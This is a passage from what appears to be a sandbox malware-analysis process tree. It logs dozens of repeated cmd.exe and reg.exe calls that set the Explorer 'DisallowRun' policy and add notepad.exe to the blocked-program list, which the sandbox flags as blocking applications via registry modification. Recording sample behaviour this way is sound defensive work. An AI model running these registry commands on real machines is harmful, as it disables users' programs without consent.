      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6680
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6744
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6780
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6828
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:4100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6900
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:6008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:6988
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:7024
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:7072
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:7124
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:1396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7160
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:5716
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:6336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7156
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5488
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6316
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6860
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:3432
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7056
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:1288
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6660
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6876
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6864
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6232
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:2828
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5648
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4880
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5792
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5732
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:3744
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4816
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4992
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4224
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:2172
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5340
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:3244
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:2724
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:2932
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:3456
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5656
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:2404
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:596
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4052
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5720
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4456
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:3740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4860
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4308
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:544
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:1412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:3504
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:4292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5508
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5408
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:1368
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:1416
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:672
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:1688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7060
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4188
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5976
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6532
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6308
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5620
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5080
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:2096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5276
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:4476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4584
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5252
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7084
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:3696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6328
  - - C:\Windows\system32\reg.exe
